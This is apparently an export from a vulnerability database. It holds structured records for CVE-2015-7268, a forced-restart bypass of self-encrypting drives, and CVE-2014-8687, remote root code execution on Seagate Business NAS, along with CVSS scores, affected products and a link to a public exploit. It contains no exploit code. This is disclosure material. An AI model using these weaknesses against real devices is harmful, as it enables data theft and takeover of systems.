    Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a "Forced Restart Attack." Samsung 850 Pro/PM851 solid-state drives and Seagate ST500LT015/ST500LT025 hard disk drives contain vulnerabilities that can bypass security functions. Information may be obtained. The Lenovo ThinkPad T440s is a laptop from Lenovo of China. The Dell Latitude E6410 is a laptop from Dell. The Samsung 850 Pro and the other listed drives are all storage drives used in laptops. The Samsung 850 Pro is a storage drive manufactured by Samsung of South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security vulnerabilities in the Samsung 850 Pro and PM851 SSDs and the Seagate ST500LT015 and ST500LT025 hard drives on several devices. A physically proximate attacker can exploit the vulnerability to bypass self-encrypting drive protection by carrying out a forced restart attack. Samsung/Seagate self-encrypting drive protection is prone to a local security-bypass vulnerability. This may aid in further attacks. The following products are vulnerable: Seagate ST500LT015 and ST500LT025; Samsung 850 Pro and PM851. For the Samsung 850 Pro and the other listed drives, the following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-0010",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "pm851",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "850 pro",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "pm851",
            "scope": null,
            "trust": 1.4,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "850 pro",
            "scope": null,
            "trust": 0.8,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "pro",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "samsung",
            "version": "850"
          },
          {
            "model": "technology st500lt015",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "technology st500lt025",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "0"
          },
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "0"
          },
          {
            "model": "pm851",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "samsung",
            "version": "0"
          },
          {
            "model": "pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "samsung",
            "version": "8500"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:seagate:st500lt025_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:samsung:850_pro_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:samsung:pm851_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Daniel Boteanu and Kevvie Fowler of KPMG.",
        "sources": [
          {
            "db": "BID",
            "id": "102334"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-7268",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "CVE-2015-7268",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "CNVD-2017-38306",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "VHN-85229",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "PHYSICAL",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.2,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 0.5,
                "id": "CVE-2015-7268",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-7268",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-7268",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-38306",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201711-1081",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-85229",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when used on Windows and operating in Opal mode on Lenovo ThinkPad T440s laptops with BIOS 2.32 or ThinkPad W541 laptops with BIOS 2.21, or in Opal or eDrive mode on Dell Latitude E6410 laptops with BIOS A16 or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by triggering a soft reset and booting from an alternative OS, aka a \"Forced Restart Attack.\". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker with a physical location approach can exploit the vulnerability to bypass self-encrypting hard disk protection by implementing a forced restart attack. Samsung/Seagate Self-Encrypting Drives Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. \nThe following products are vulnerable:\nSeagate ST500LT015 and ST500LT025\nSamsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-7268",
            "trust": 3.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "102334",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "id": "VAR-201711-0010",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          }
        ],
        "trust": 1.4942857200000002
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:25:55.683000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Samsung 850 Pro",
            "trust": 0.8,
            "url": "http://www.samsung.com/semiconductor/minisite/jp/ssd/consumer/850pro/"
          },
          {
            "title": "Samsung PM851 Solid State Drive",
            "trust": 0.8,
            "url": "https://www.samsung.com/us/business/oem-solutions/pdfs/PM851-SSD-ProdOverview.pdf"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-254",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
          },
          {
            "trust": 2.0,
            "url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7268"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7268"
          },
          {
            "trust": 0.3,
            "url": "www.samsung.com"
          },
          {
            "trust": 0.3,
            "url": "https://www.seagate.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102334"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "date": "2017-11-27T22:29:00.287000",
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38306"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85229"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102334"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2015-7268"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "BID",
            "id": "102334"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          }
        ],
        "trust": 0.9
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Samsung 850 Pro/PM851 of  SSD and  Seagate ST500LT015/ST500LT025 of  HDD Vulnerabilities that bypass security functions",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008067"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1081"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201706-0189

    Vulnerability from variot - Updated: 2025-04-20 23:24

    Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging the use of a static encryption key to create session tokens. Seagate Business Storage 2-Bay NAS is prone to a remote-code-execution vulnerability. Failed exploit attempts will cause a denial-of-service condition.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201706-0189",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "business nas",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": "2014.00319"
          },
          {
            "model": "business nas",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "seagate",
            "version": "2015.00322"
          },
          {
            "model": "business storage 2-bay nas",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2014.00319"
          },
          {
            "model": "business storage 2-bay nas",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2013.60311"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:business_nas_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OJ Reeves",
        "sources": [
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2014-8687",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-8687",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-76632",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2014-8687",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-8687",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-8687",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201503-218",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-76632",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-8687",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Business NAS devices with firmware before 2015.00322 allow remote attackers to execute arbitrary code with root privileges by leveraging use of a static encryption key to create session tokens. Seagate Business Storage 2-Bay NAS is prone to a remote-code-execution vulnerability. Failed exploit attempts will cause a denial-of-service condition",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=36202",
            "trust": 0.2,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-76632",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
